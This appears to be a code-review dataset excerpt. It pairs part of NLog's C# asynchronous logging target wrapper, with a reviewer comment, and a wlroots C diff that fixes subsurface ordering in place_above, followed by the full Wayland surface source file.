/// Gets or sets the limit of full <see cref="BatchSize"/>s to write before yielding into <see cref="TimeToSleepBetweenBatches"/>
/// Performance is better when writing many small batches, than writing a single large batch
/// </summary>
/// <docgen category='Buffering Options' order='100' />
[DefaultValue(5)]
public int FullBatchSizeWriteLimit { get; set; }
/// <summary>
/// Gets the queue of lazy writer thread requests.
/// </summary>
internal AsyncRequestQueue RequestQueue { get; private set; }
/// <summary>
/// Schedules a flush of pending events in the queue (if any), followed by flushing the WrappedTarget.
/// </summary>
/// <param name="asyncContinuation">The asynchronous continuation.</param>
protected override void FlushAsync(AsyncContinuation asyncContinuation)
{
if (_flushEventsInQueueDelegate == null)
_flushEventsInQueueDelegate = FlushEventsInQueue;
AsyncHelpers.StartAsyncTask(_flushEventsInQueueDelegate, asyncContinuation);
}
private Action<object> _flushEventsInQueueDelegate;
/// <summary>
/// Initializes the target by starting the lazy writer timer.
/// </summary>
protected override void InitializeTarget()
{
base.InitializeTarget();
if (!OptimizeBufferReuse && WrappedTarget != null && WrappedTarget.OptimizeBufferReuse)
OptimizeBufferReuse = GetType() == typeof(AsyncTargetWrapper); // Class not sealed, reduce breaking changes
RequestQueue.Clear();
InternalLogger.Trace("AsyncWrapper(Name={0}): Start Timer", Name);
_lazyWriterTimer = new Timer(ProcessPendingEvents, null, Timeout.Infinite, Timeout.Infinite);
StartLazyWriterTimer();
}
/// <summary>
/// Shuts down the lazy writer timer.
/// </summary>
protected override void CloseTarget()
{
StopLazyWriterThread();
if (Monitor.TryEnter(_writeLockObject, 500))
{
try
{
WriteEventsInQueue(int.MaxValue, "Closing Target");
}
finally
{
Monitor.Exit(_writeLockObject);
}
}
base.CloseTarget();
}
/// <summary>
/// Starts the lazy writer thread which periodically writes
/// queued log messages.
/// </summary>
protected virtual void StartLazyWriterTimer()
{
lock (_timerLockObject)
{
if (_lazyWriterTimer != null)
{
if (TimeToSleepBetweenBatches <= 0)
{
InternalLogger.Trace("AsyncWrapper(Name={0}): Throttled timer scheduled", Name);
_lazyWriterTimer.Change(1, Timeout.Infinite);
}
else
{
_lazyWriterTimer.Change(TimeToSleepBetweenBatches, Timeout.Infinite);
}
}
}
}
/// <summary>
/// Attempts to start an instant timer-worker-thread which can write
/// queued log messages.
/// </summary>
/// <returns>Returns true when scheduled a timer-worker-thread</returns>
protected virtual bool StartInstantWriterTimer()
{
bool lockTaken = false;
try
{
lockTaken = Monitor.TryEnter(_writeLockObject);
if (lockTaken)
{
// Lock taken means no timer-worker-thread is active writing, schedule timer now
lock (_timerLockObject)
{
if (_lazyWriterTimer != null)
{
// Not optimal to shedule timer-worker-thread while holding lock,
// as the newly scheduled timer-worker-thread will hammer into the writeLockObject
_lazyWriterTimer.Change(0, Timeout.Infinite);
return true;
}
}
}
return false;
}
finally
{
// If not able to take lock, then it means timer-worker-thread is already active,
// and timer-worker-thread will check RequestQueue after leaving writeLockObject
if (lockTaken)
Monitor.Exit(_writeLockObject);
}
}
/// <summary>
/// Stops the lazy writer thread.
/// </summary>
protected virtual void StopLazyWriterThread()
{
lock (_timerLockObject)
{
var currentTimer = _lazyWriterTimer;
if (currentTimer != null)
{
_lazyWriterTimer = null;
currentTimer.WaitForDispose(TimeSpan.FromSeconds(1));
}
}
}
/// <summary>
/// Adds the log event to asynchronous queue to be processed by
/// the lazy writer thread.
/// </summary>
/// <param name="logEvent">The log event.</param>
/// <remarks>
/// The <see cref="Target.PrecalculateVolatileLayouts"/> is called
/// to ensure that the log event can be processed in another thread.
/// </remarks>
protected override void Write(AsyncLogEventInfo logEvent)
{
MergeEventProperties(logEvent.LogEvent);
PrecalculateVolatileLayouts(logEvent.LogEvent);
bool queueWasEmpty = RequestQueue.Enqueue(logEvent);
if (queueWasEmpty && TimeToSleepBetweenBatches <= 0)
StartInstantWriterTimer();
}
/// <summary>
/// Write to queue without locking <see cref="Target.SyncRoot"/>
/// </summary>
/// <param name="logEvent"></param>
protected override void WriteAsyncThreadSafe(AsyncLogEventInfo logEvent)
{
try
{
Write(logEvent);
}
catch (Exception exception)
{
if (exception.MustBeRethrown())
{
throw;
}
logEvent.Continuation(exception);
}
}
private void ProcessPendingEvents(object state)
{
if (_lazyWriterTimer == null)
return;
bool wroteFullBatchSize = false;
try
{
lock (_writeLockObject)
{
int count = WriteEventsInQueue(BatchSize, "Timer");
if (count == BatchSize)
wroteFullBatchSize = true;
if (wroteFullBatchSize && TimeToSleepBetweenBatches <= 0)
StartInstantWriterTimer(); // Found full batch, fast schedule to take next batch (within lock to avoid pile up)
}
}
catch (Exception exception)
{
wroteFullBatchSize = false; // Something went wrong, lets throttle retry
InternalLogger.Error(exception, "AsyncWrapper(Name={0}): Error in lazy writer timer procedure.", Name);
if (exception.MustBeRethrownImmediately())
{
throw; // Throwing exceptions here will crash the entire application (.NET 2.0 behavior)
}
}
finally
{
if (TimeToSleepBetweenBatches <= 0)
{
// If queue was not empty, then more might have arrived while writing the first batch
// Uses throttled timer here, so we can process in batches (faster)
if (!wroteFullBatchSize && RequestQueue.RequestCount > 0)
StartLazyWriterTimer(); // Queue was checked as empty, but now we have more
}
else
{
StartLazyWriterTimer();
}
}
}
private void FlushEventsInQueue(object state)
{
try
{
var asyncContinuation = state as AsyncContinuation;
lock (_writeLockObject)
{
WriteEventsInQueue(int.MaxValue, "Flush Async");
if (asyncContinuation != null)
base.FlushAsync(asyncContinuation);
}
if (TimeToSleepBetweenBatches <= 0 && RequestQueue.RequestCount > 0)
StartLazyWriterTimer(); // Queue was checked as empty, but now we have more
}
catch (Exception exception)
{
InternalLogger.Error(exception, "AsyncWrapper(Name={0}): Error in flush procedure.", Name);
if (exception.MustBeRethrownImmediately())
{
throw; // Throwing exceptions here will crash the entire application (.NET 2.0 behavior)
}
}
}
private int WriteEventsInQueue(int batchSize, string reason)
{
if (WrappedTarget == null)
{
InternalLogger.Error("AsyncWrapper(Name={0}): WrappedTarget is NULL", Name);
return 0;
}
int count = 0;
for (int i = 0; i < FullBatchSizeWriteLimit; ++i)
{
if (!OptimizeBufferReuse || batchSize == int.MaxValue)
{
var logEvents = RequestQueue.DequeueBatch(batchSize);
if (logEvents.Length > 0)
{
if (reason != null)
InternalLogger.Trace("AsyncWrapper(Name={0}): Writing {1} events ({2})", Name, logEvents.Length, reason);
WrappedTarget.WriteAsyncLogEvents(logEvents);
}
count = logEvents.Length;
}
else
{
using (var targetList = _reusableAsyncLogEventList.Allocate())
{
var logEvents = targetList.Result;
RequestQueue.DequeueBatch(batchSize, logEvents);
if (logEvents.Count > 0)
{
if (reason != null)
InternalLogger.Trace("AsyncWrapper(Name={0}): Writing {1} events ({2})", Name, logEvents.Count, reason);
WrappedTarget.WriteAsyncLogEvents(logEvents);
}
count = logEvents.Count;
}
}
if (count < batchSize)
break;
}
return count;
}
}
} | 1 | 16,976 | another option would be to create a `CreateRequestQueue(bool lockingQeueue)`, and set it only in `InitializeTarget`, isn't? The would prefer having the creation and "business" rules for the creation in one region, I think `InitializeTarget` would be the best place. | NLog-NLog | .cs |
@@ -805,7 +805,7 @@ static void subsurface_handle_place_above(struct wl_client *client,
}
wl_list_remove(&subsurface->parent_pending_link);
- wl_list_insert(sibling->parent_pending_link.prev,
+ wl_list_insert(&sibling->parent_pending_link,
&subsurface->parent_pending_link);
subsurface->reordered = true; | 1 | #include <assert.h>
#include <stdlib.h>
#include <wayland-server.h>
#include <wlr/render/egl.h>
#include <wlr/render/interface.h>
#include <wlr/types/wlr_compositor.h>
#include <wlr/types/wlr_linux_dmabuf.h>
#include <wlr/types/wlr_matrix.h>
#include <wlr/types/wlr_region.h>
#include <wlr/types/wlr_surface.h>
#include <wlr/util/log.h>
#include <wlr/util/region.h>
#include "util/signal.h"
#define CALLBACK_VERSION 1
#define SURFACE_VERSION 4
#define SUBSURFACE_VERSION 1
static int min(int fst, int snd) {
if (fst < snd) {
return fst;
} else {
return snd;
}
}
static int max(int fst, int snd) {
if (fst > snd) {
return fst;
} else {
return snd;
}
}
static void surface_state_reset_buffer(struct wlr_surface_state *state) {
if (state->buffer) {
wl_list_remove(&state->buffer_destroy_listener.link);
state->buffer = NULL;
}
}
static void surface_handle_buffer_destroy(struct wl_listener *listener,
void *data) {
struct wlr_surface_state *state =
wl_container_of(listener, state, buffer_destroy_listener);
surface_state_reset_buffer(state);
}
static void surface_state_release_buffer(struct wlr_surface_state *state) {
if (state->buffer) {
wl_buffer_send_release(state->buffer);
surface_state_reset_buffer(state);
}
}
static void surface_state_set_buffer(struct wlr_surface_state *state,
struct wl_resource *buffer) {
surface_state_reset_buffer(state);
state->buffer = buffer;
if (buffer) {
wl_resource_add_destroy_listener(buffer,
&state->buffer_destroy_listener);
state->buffer_destroy_listener.notify = surface_handle_buffer_destroy;
}
}
static void surface_destroy(struct wl_client *client,
struct wl_resource *resource) {
wl_resource_destroy(resource);
}
static void surface_attach(struct wl_client *client,
struct wl_resource *resource,
struct wl_resource *buffer, int32_t sx, int32_t sy) {
struct wlr_surface *surface = wlr_surface_from_resource(resource);
surface->pending->invalid |= WLR_SURFACE_INVALID_BUFFER;
surface->pending->sx = sx;
surface->pending->sy = sy;
surface_state_set_buffer(surface->pending, buffer);
}
static void surface_damage(struct wl_client *client,
struct wl_resource *resource,
int32_t x, int32_t y, int32_t width, int32_t height) {
struct wlr_surface *surface = wlr_surface_from_resource(resource);
if (width < 0 || height < 0) {
return;
}
surface->pending->invalid |= WLR_SURFACE_INVALID_SURFACE_DAMAGE;
pixman_region32_union_rect(&surface->pending->surface_damage,
&surface->pending->surface_damage,
x, y, width, height);
}
static struct wlr_frame_callback *frame_callback_from_resource(
struct wl_resource *resource) {
assert(wl_resource_instance_of(resource, &wl_callback_interface, NULL));
return wl_resource_get_user_data(resource);
}
static void callback_handle_resource_destroy(struct wl_resource *resource) {
struct wlr_frame_callback *cb = frame_callback_from_resource(resource);
wl_list_remove(&cb->link);
free(cb);
}
static void surface_frame(struct wl_client *client,
struct wl_resource *resource, uint32_t callback) {
struct wlr_surface *surface = wlr_surface_from_resource(resource);
struct wlr_frame_callback *cb =
calloc(1, sizeof(struct wlr_frame_callback));
if (cb == NULL) {
wl_resource_post_no_memory(resource);
return;
}
cb->resource = wl_resource_create(client, &wl_callback_interface,
CALLBACK_VERSION, callback);
if (cb->resource == NULL) {
free(cb);
wl_resource_post_no_memory(resource);
return;
}
wl_resource_set_implementation(cb->resource, NULL, cb,
callback_handle_resource_destroy);
wl_list_insert(surface->pending->frame_callback_list.prev, &cb->link);
surface->pending->invalid |= WLR_SURFACE_INVALID_FRAME_CALLBACK_LIST;
}
static void surface_set_opaque_region(struct wl_client *client,
struct wl_resource *resource,
struct wl_resource *region_resource) {
struct wlr_surface *surface = wlr_surface_from_resource(resource);
if ((surface->pending->invalid & WLR_SURFACE_INVALID_OPAQUE_REGION)) {
pixman_region32_clear(&surface->pending->opaque);
}
surface->pending->invalid |= WLR_SURFACE_INVALID_OPAQUE_REGION;
if (region_resource) {
pixman_region32_t *region = wlr_region_from_resource(region_resource);
pixman_region32_copy(&surface->pending->opaque, region);
} else {
pixman_region32_clear(&surface->pending->opaque);
}
}
static void surface_set_input_region(struct wl_client *client,
struct wl_resource *resource, struct wl_resource *region_resource) {
struct wlr_surface *surface = wlr_surface_from_resource(resource);
surface->pending->invalid |= WLR_SURFACE_INVALID_INPUT_REGION;
if (region_resource) {
pixman_region32_t *region = wlr_region_from_resource(region_resource);
pixman_region32_copy(&surface->pending->input, region);
} else {
pixman_region32_fini(&surface->pending->input);
pixman_region32_init_rect(&surface->pending->input,
INT32_MIN, INT32_MIN, UINT32_MAX, UINT32_MAX);
}
}
static bool surface_update_size(struct wlr_surface *surface,
struct wlr_surface_state *state) {
if (!state->buffer) {
pixman_region32_union_rect(&state->surface_damage,
&state->surface_damage, 0, 0, state->width, state->height);
state->height = 0;
state->width = 0;
return true;
}
int scale = state->scale;
enum wl_output_transform transform = state->transform;
struct wl_shm_buffer *buf = wl_shm_buffer_get(state->buffer);
if (buf != NULL) {
state->buffer_width = wl_shm_buffer_get_width(buf);
state->buffer_height = wl_shm_buffer_get_height(buf);
} else if (wlr_renderer_resource_is_wl_drm_buffer(surface->renderer,
state->buffer)) {
wlr_renderer_wl_drm_buffer_get_size(surface->renderer, state->buffer,
&state->buffer_width, &state->buffer_height);
} else if (wlr_dmabuf_resource_is_buffer(state->buffer)) {
struct wlr_dmabuf_buffer *dmabuf =
wlr_dmabuf_buffer_from_buffer_resource(state->buffer);
state->buffer_width = dmabuf->attributes.width;
state->buffer_height = dmabuf->attributes.height;
} else {
wlr_log(L_ERROR, "Unknown buffer handle attached");
state->buffer_width = 0;
state->buffer_height = 0;
}
int width = state->buffer_width / scale;
int height = state->buffer_height / scale;
if (transform == WL_OUTPUT_TRANSFORM_90 ||
transform == WL_OUTPUT_TRANSFORM_270 ||
transform == WL_OUTPUT_TRANSFORM_FLIPPED_90 ||
transform == WL_OUTPUT_TRANSFORM_FLIPPED_270) {
int tmp = width;
width = height;
height = tmp;
}
bool update_damage = false;
if (width != state->width || height != state->height) {
// Damage the whole surface on resize
// This isn't in the spec, but Weston does it and QT expects it
pixman_region32_union_rect(&state->surface_damage,
&state->surface_damage, 0, 0, state->width, state->height);
pixman_region32_union_rect(&state->surface_damage,
&state->surface_damage, 0, 0, width, height);
update_damage = true;
}
state->width = width;
state->height = height;
return update_damage;
}
/**
* Append pending state to current state and clear pending state.
*/
static void surface_move_state(struct wlr_surface *surface,
struct wlr_surface_state *next, struct wlr_surface_state *state) {
bool update_damage = false;
bool update_size = false;
int oldw = state->width;
int oldh = state->height;
if ((next->invalid & WLR_SURFACE_INVALID_SCALE)) {
state->scale = next->scale;
update_size = true;
}
if ((next->invalid & WLR_SURFACE_INVALID_TRANSFORM)) {
state->transform = next->transform;
update_size = true;
}
if ((next->invalid & WLR_SURFACE_INVALID_BUFFER)) {
surface_state_release_buffer(state);
surface_state_set_buffer(state, next->buffer);
surface_state_reset_buffer(next);
state->sx = next->sx;
state->sy = next->sy;
update_size = true;
}
if (update_size) {
update_damage = surface_update_size(surface, state);
}
if ((next->invalid & WLR_SURFACE_INVALID_SURFACE_DAMAGE)) {
pixman_region32_intersect_rect(&next->surface_damage,
&next->surface_damage, 0, 0, state->width, state->height);
pixman_region32_union(&state->surface_damage, &state->surface_damage,
&next->surface_damage);
pixman_region32_clear(&next->surface_damage);
update_damage = true;
}
if ((next->invalid & WLR_SURFACE_INVALID_BUFFER_DAMAGE)) {
pixman_region32_intersect_rect(&next->buffer_damage,
&next->buffer_damage, 0, 0, state->buffer_width,
state->buffer_height);
pixman_region32_union(&state->buffer_damage, &state->buffer_damage,
&next->buffer_damage);
pixman_region32_clear(&next->buffer_damage);
update_damage = true;
}
if (update_damage) {
pixman_region32_t buffer_damage, surface_damage;
pixman_region32_init(&buffer_damage);
pixman_region32_init(&surface_damage);
// Surface to buffer damage
pixman_region32_copy(&buffer_damage, &state->surface_damage);
wlr_region_transform(&buffer_damage, &buffer_damage,
wlr_output_transform_invert(state->transform),
state->width, state->height);
wlr_region_scale(&buffer_damage, &buffer_damage, state->scale);
// Buffer to surface damage
pixman_region32_copy(&surface_damage, &state->buffer_damage);
wlr_region_transform(&surface_damage, &surface_damage, state->transform,
state->buffer_width, state->buffer_height);
wlr_region_scale(&surface_damage, &surface_damage, 1.0f/state->scale);
pixman_region32_union(&state->buffer_damage, &state->buffer_damage,
&buffer_damage);
pixman_region32_union(&state->surface_damage, &state->surface_damage,
&surface_damage);
pixman_region32_fini(&buffer_damage);
pixman_region32_fini(&surface_damage);
}
if ((next->invalid & WLR_SURFACE_INVALID_OPAQUE_REGION)) {
// TODO: process buffer
pixman_region32_clear(&next->opaque);
}
if ((next->invalid & WLR_SURFACE_INVALID_INPUT_REGION)) {
// TODO: process buffer
pixman_region32_copy(&state->input, &next->input);
}
if ((next->invalid & WLR_SURFACE_INVALID_SUBSURFACE_POSITION)) {
// Subsurface has moved
int dx = state->subsurface_position.x - next->subsurface_position.x;
int dy = state->subsurface_position.y - next->subsurface_position.y;
state->subsurface_position.x = next->subsurface_position.x;
state->subsurface_position.y = next->subsurface_position.y;
next->subsurface_position.x = 0;
next->subsurface_position.y = 0;
if (dx != 0 || dy != 0) {
pixman_region32_union_rect(&state->surface_damage,
&state->surface_damage, dx, dy, oldw, oldh);
pixman_region32_union_rect(&state->surface_damage,
&state->surface_damage, 0, 0, state->width, state->height);
}
}
if ((next->invalid & WLR_SURFACE_INVALID_FRAME_CALLBACK_LIST)) {
wl_list_insert_list(&state->frame_callback_list,
&next->frame_callback_list);
wl_list_init(&next->frame_callback_list);
}
state->invalid |= next->invalid;
next->invalid = 0;
}
static void surface_damage_subsurfaces(struct wlr_subsurface *subsurface) {
// XXX: This is probably the wrong way to do it, because this damage should
// come from the client, but weston doesn't do it correctly either and it
// seems to work ok. See the comment on weston_surface_damage for more info
// about a better approach.
struct wlr_surface *surface = subsurface->surface;
pixman_region32_union_rect(&surface->current->surface_damage,
&surface->current->surface_damage,
0, 0, surface->current->width,
surface->current->height);
subsurface->reordered = false;
struct wlr_subsurface *child;
wl_list_for_each(child, &subsurface->surface->subsurfaces, parent_link) {
surface_damage_subsurfaces(child);
}
}
static void surface_apply_damage(struct wlr_surface *surface,
bool invalid_buffer, bool reupload_buffer) {
struct wl_resource *resource = surface->current->buffer;
if (resource == NULL) {
return;
}
struct wl_shm_buffer *buf = wl_shm_buffer_get(resource);
if (buf != NULL) {
wl_shm_buffer_begin_access(buf);
enum wl_shm_format fmt = wl_shm_buffer_get_format(buf);
int32_t stride = wl_shm_buffer_get_stride(buf);
int32_t width = wl_shm_buffer_get_width(buf);
int32_t height = wl_shm_buffer_get_height(buf);
void *data = wl_shm_buffer_get_data(buf);
if (surface->texture == NULL || reupload_buffer) {
wlr_texture_destroy(surface->texture);
surface->texture = wlr_texture_from_pixels(surface->renderer, fmt,
stride, width, height, data);
} else {
pixman_region32_t damage;
pixman_region32_init(&damage);
pixman_region32_copy(&damage, &surface->current->buffer_damage);
pixman_region32_intersect_rect(&damage, &damage, 0, 0,
surface->current->buffer_width,
surface->current->buffer_height);
int n;
pixman_box32_t *rects = pixman_region32_rectangles(&damage, &n);
for (int i = 0; i < n; ++i) {
pixman_box32_t *r = &rects[i];
if (!wlr_texture_write_pixels(surface->texture, fmt, stride,
r->x2 - r->x1, r->y2 - r->y1, r->x1, r->y1,
r->x1, r->y1, data)) {
break;
}
}
pixman_region32_fini(&damage);
}
wl_shm_buffer_end_access(buf);
} else if (invalid_buffer || reupload_buffer) {
wlr_texture_destroy(surface->texture);
if (wlr_renderer_resource_is_wl_drm_buffer(surface->renderer, resource)) {
surface->texture =
wlr_texture_from_wl_drm(surface->renderer, resource);
} else if (wlr_dmabuf_resource_is_buffer(resource)) {
struct wlr_dmabuf_buffer *dmabuf =
wlr_dmabuf_buffer_from_buffer_resource(resource);
surface->texture =
wlr_texture_from_dmabuf(surface->renderer, &dmabuf->attributes);
} else {
surface->texture = NULL;
wlr_log(L_ERROR, "Unknown buffer handle attached");
}
}
surface_state_release_buffer(surface->current);
}
static void surface_commit_pending(struct wlr_surface *surface) {
int32_t oldw = surface->current->buffer_width;
int32_t oldh = surface->current->buffer_height;
bool invalid_buffer = surface->pending->invalid & WLR_SURFACE_INVALID_BUFFER;
bool null_buffer_commit = invalid_buffer && surface->pending->buffer == NULL;
surface_move_state(surface, surface->pending, surface->current);
if (null_buffer_commit) {
wlr_texture_destroy(surface->texture);
surface->texture = NULL;
}
bool reupload_buffer = oldw != surface->current->buffer_width ||
oldh != surface->current->buffer_height;
surface_apply_damage(surface, invalid_buffer, reupload_buffer);
// commit subsurface order
struct wlr_subsurface *subsurface;
wl_list_for_each_reverse(subsurface, &surface->subsurface_pending_list,
parent_pending_link) {
wl_list_remove(&subsurface->parent_link);
wl_list_insert(&surface->subsurfaces, &subsurface->parent_link);
if (subsurface->reordered) {
// TODO: damage all the subsurfaces
surface_damage_subsurfaces(subsurface);
}
}
if (surface->role_committed) {
surface->role_committed(surface, surface->role_data);
}
// TODO: add the invalid bitfield to this callback
wlr_signal_emit_safe(&surface->events.commit, surface);
pixman_region32_clear(&surface->current->surface_damage);
pixman_region32_clear(&surface->current->buffer_damage);
}
static bool subsurface_is_synchronized(struct wlr_subsurface *subsurface) {
while (1) {
if (subsurface->synchronized) {
return true;
}
if (!subsurface->parent) {
return false;
}
if (!wlr_surface_is_subsurface(subsurface->parent)) {
break;
}
subsurface = wlr_subsurface_from_surface(subsurface->parent);
}
return false;
}
/**
* Recursive function to commit the effectively synchronized children.
*/
static void subsurface_parent_commit(struct wlr_subsurface *subsurface,
bool synchronized) {
struct wlr_surface *surface = subsurface->surface;
if (synchronized || subsurface->synchronized) {
if (subsurface->has_cache) {
surface_move_state(surface, subsurface->cached, surface->pending);
surface_commit_pending(surface);
subsurface->has_cache = false;
subsurface->cached->invalid = 0;
}
struct wlr_subsurface *tmp;
wl_list_for_each(tmp, &surface->subsurfaces, parent_link) {
subsurface_parent_commit(tmp, true);
}
}
}
static void subsurface_commit(struct wlr_subsurface *subsurface) {
struct wlr_surface *surface = subsurface->surface;
if (subsurface_is_synchronized(subsurface)) {
surface_move_state(surface, surface->pending, subsurface->cached);
subsurface->has_cache = true;
} else {
if (subsurface->has_cache) {
surface_move_state(surface, subsurface->cached, surface->pending);
surface_commit_pending(surface);
subsurface->has_cache = false;
} else {
surface_commit_pending(surface);
}
struct wlr_subsurface *tmp;
wl_list_for_each(tmp, &surface->subsurfaces, parent_link) {
subsurface_parent_commit(tmp, false);
}
}
}
static void surface_commit(struct wl_client *client,
struct wl_resource *resource) {
struct wlr_surface *surface = wlr_surface_from_resource(resource);
if (wlr_surface_is_subsurface(surface)) {
struct wlr_subsurface *subsurface =
wlr_subsurface_from_surface(surface);
subsurface_commit(subsurface);
return;
}
surface_commit_pending(surface);
struct wlr_subsurface *tmp;
wl_list_for_each(tmp, &surface->subsurfaces, parent_link) {
subsurface_parent_commit(tmp, false);
}
}
static void surface_set_buffer_transform(struct wl_client *client,
struct wl_resource *resource, int transform) {
struct wlr_surface *surface = wlr_surface_from_resource(resource);
surface->pending->invalid |= WLR_SURFACE_INVALID_TRANSFORM;
surface->pending->transform = transform;
}
static void surface_set_buffer_scale(struct wl_client *client,
struct wl_resource *resource,
int32_t scale) {
struct wlr_surface *surface = wlr_surface_from_resource(resource);
surface->pending->invalid |= WLR_SURFACE_INVALID_SCALE;
surface->pending->scale = scale;
}
static void surface_damage_buffer(struct wl_client *client,
struct wl_resource *resource,
int32_t x, int32_t y, int32_t width,
int32_t height) {
struct wlr_surface *surface = wlr_surface_from_resource(resource);
if (width < 0 || height < 0) {
return;
}
surface->pending->invalid |= WLR_SURFACE_INVALID_BUFFER_DAMAGE;
pixman_region32_union_rect(&surface->pending->buffer_damage,
&surface->pending->buffer_damage,
x, y, width, height);
}
static const struct wl_surface_interface surface_interface = {
.destroy = surface_destroy,
.attach = surface_attach,
.damage = surface_damage,
.frame = surface_frame,
.set_opaque_region = surface_set_opaque_region,
.set_input_region = surface_set_input_region,
.commit = surface_commit,
.set_buffer_transform = surface_set_buffer_transform,
.set_buffer_scale = surface_set_buffer_scale,
.damage_buffer = surface_damage_buffer
};
struct wlr_surface *wlr_surface_from_resource(struct wl_resource *resource) {
assert(wl_resource_instance_of(resource, &wl_surface_interface,
&surface_interface));
return wl_resource_get_user_data(resource);
}
static struct wlr_surface_state *surface_state_create(void) {
struct wlr_surface_state *state =
calloc(1, sizeof(struct wlr_surface_state));
if (state == NULL) {
return NULL;
}
state->scale = 1;
state->transform = WL_OUTPUT_TRANSFORM_NORMAL;
wl_list_init(&state->frame_callback_list);
pixman_region32_init(&state->surface_damage);
pixman_region32_init(&state->buffer_damage);
pixman_region32_init(&state->opaque);
pixman_region32_init_rect(&state->input,
INT32_MIN, INT32_MIN, UINT32_MAX, UINT32_MAX);
return state;
}
static void surface_state_destroy(struct wlr_surface_state *state) {
surface_state_reset_buffer(state);
struct wlr_frame_callback *cb, *tmp;
wl_list_for_each_safe(cb, tmp, &state->frame_callback_list, link) {
wl_resource_destroy(cb->resource);
}
pixman_region32_fini(&state->surface_damage);
pixman_region32_fini(&state->buffer_damage);
pixman_region32_fini(&state->opaque);
pixman_region32_fini(&state->input);
free(state);
}
static void subsurface_destroy(struct wlr_subsurface *subsurface) {
if (subsurface == NULL) {
return;
}
wlr_signal_emit_safe(&subsurface->events.destroy, subsurface);
wl_list_remove(&subsurface->surface_destroy.link);
surface_state_destroy(subsurface->cached);
if (subsurface->parent) {
wl_list_remove(&subsurface->parent_link);
wl_list_remove(&subsurface->parent_pending_link);
wl_list_remove(&subsurface->parent_destroy.link);
}
wl_resource_set_user_data(subsurface->resource, NULL);
if (subsurface->surface) {
subsurface->surface->role_data = NULL;
}
free(subsurface);
}
static void surface_handle_resource_destroy(struct wl_resource *resource) {
struct wlr_surface *surface = wlr_surface_from_resource(resource);
wlr_signal_emit_safe(&surface->events.destroy, surface);
wl_list_remove(wl_resource_get_link(surface->resource));
wl_list_remove(&surface->renderer_destroy.link);
wlr_texture_destroy(surface->texture);
surface_state_destroy(surface->pending);
surface_state_destroy(surface->current);
free(surface);
}
static void surface_handle_renderer_destroy(struct wl_listener *listener,
void *data) {
struct wlr_surface *surface =
wl_container_of(listener, surface, renderer_destroy);
wl_resource_destroy(surface->resource);
}
struct wlr_surface *wlr_surface_create(struct wl_client *client,
uint32_t version, uint32_t id, struct wlr_renderer *renderer,
struct wl_list *resource_list) {
assert(version <= SURFACE_VERSION);
struct wlr_surface *surface = calloc(1, sizeof(struct wlr_surface));
if (!surface) {
wl_client_post_no_memory(client);
return NULL;
}
surface->resource = wl_resource_create(client, &wl_surface_interface,
version, id);
if (surface->resource == NULL) {
free(surface);
wl_client_post_no_memory(client);
return NULL;
}
wl_resource_set_implementation(surface->resource, &surface_interface,
surface, surface_handle_resource_destroy);
wlr_log(L_DEBUG, "New wlr_surface %p (res %p)", surface, surface->resource);
surface->renderer = renderer;
surface->current = surface_state_create();
surface->pending = surface_state_create();
wl_signal_init(&surface->events.commit);
wl_signal_init(&surface->events.destroy);
wl_signal_init(&surface->events.new_subsurface);
wl_list_init(&surface->subsurfaces);
wl_list_init(&surface->subsurface_pending_list);
wl_signal_add(&renderer->events.destroy, &surface->renderer_destroy);
surface->renderer_destroy.notify = surface_handle_renderer_destroy;
struct wl_list *resource_link = wl_resource_get_link(surface->resource);
if (resource_list != NULL) {
wl_list_insert(resource_list, resource_link);
} else {
wl_list_init(resource_link);
}
return surface;
}
bool wlr_surface_has_buffer(struct wlr_surface *surface) {
return surface->texture != NULL;
}
int wlr_surface_set_role(struct wlr_surface *surface, const char *role,
struct wl_resource *error_resource, uint32_t error_code) {
assert(role);
if (surface->role == NULL ||
surface->role == role ||
strcmp(surface->role, role) == 0) {
surface->role = role;
return 0;
}
wl_resource_post_error(error_resource, error_code,
"Cannot assign role %s to wl_surface@%d, already has role %s\n",
role,
wl_resource_get_id(surface->resource),
surface->role);
return -1;
}
static const struct wl_subsurface_interface subsurface_implementation;
static struct wlr_subsurface *subsurface_from_resource(
struct wl_resource *resource) {
assert(wl_resource_instance_of(resource, &wl_subsurface_interface,
&subsurface_implementation));
return wl_resource_get_user_data(resource);
}
static void subsurface_resource_destroy(struct wl_resource *resource) {
struct wlr_subsurface *subsurface = subsurface_from_resource(resource);
wl_list_remove(wl_resource_get_link(resource));
subsurface_destroy(subsurface);
}
static void subsurface_handle_destroy(struct wl_client *client,
struct wl_resource *resource) {
wl_resource_destroy(resource);
}
static void subsurface_handle_set_position(struct wl_client *client,
struct wl_resource *resource, int32_t x, int32_t y) {
struct wlr_subsurface *subsurface = subsurface_from_resource(resource);
if (subsurface == NULL) {
return;
}
struct wlr_surface *surface = subsurface->surface;
surface->pending->invalid |= WLR_SURFACE_INVALID_SUBSURFACE_POSITION;
surface->pending->subsurface_position.x = x;
surface->pending->subsurface_position.y = y;
}
static struct wlr_subsurface *subsurface_find_sibling(
struct wlr_subsurface *subsurface, struct wlr_surface *surface) {
struct wlr_surface *parent = subsurface->parent;
struct wlr_subsurface *sibling;
wl_list_for_each(sibling, &parent->subsurfaces, parent_link) {
if (sibling->surface == surface && sibling != subsurface) {
return sibling;
}
}
return NULL;
}
static void subsurface_handle_place_above(struct wl_client *client,
struct wl_resource *resource, struct wl_resource *sibling_resource) {
struct wlr_subsurface *subsurface = subsurface_from_resource(resource);
if (subsurface == NULL) {
return;
}
struct wlr_surface *sibling_surface =
wlr_surface_from_resource(sibling_resource);
struct wlr_subsurface *sibling =
subsurface_find_sibling(subsurface, sibling_surface);
if (!sibling) {
wl_resource_post_error(subsurface->resource,
WL_SUBSURFACE_ERROR_BAD_SURFACE,
"%s: wl_surface@%d is not a parent or sibling",
"place_above", wl_resource_get_id(sibling_surface->resource));
return;
}
wl_list_remove(&subsurface->parent_pending_link);
wl_list_insert(sibling->parent_pending_link.prev,
&subsurface->parent_pending_link);
subsurface->reordered = true;
}
static void subsurface_handle_place_below(struct wl_client *client,
struct wl_resource *resource, struct wl_resource *sibling_resource) {
struct wlr_subsurface *subsurface = subsurface_from_resource(resource);
if (subsurface == NULL) {
return;
}
struct wlr_surface *sibling_surface =
wlr_surface_from_resource(sibling_resource);
struct wlr_subsurface *sibling =
subsurface_find_sibling(subsurface, sibling_surface);
if (!sibling) {
wl_resource_post_error(subsurface->resource,
WL_SUBSURFACE_ERROR_BAD_SURFACE,
"%s: wl_surface@%d is not a parent or sibling",
"place_below", wl_resource_get_id(sibling_surface->resource));
return;
}
wl_list_remove(&subsurface->parent_pending_link);
wl_list_insert(&sibling->parent_pending_link,
&subsurface->parent_pending_link);
subsurface->reordered = true;
}
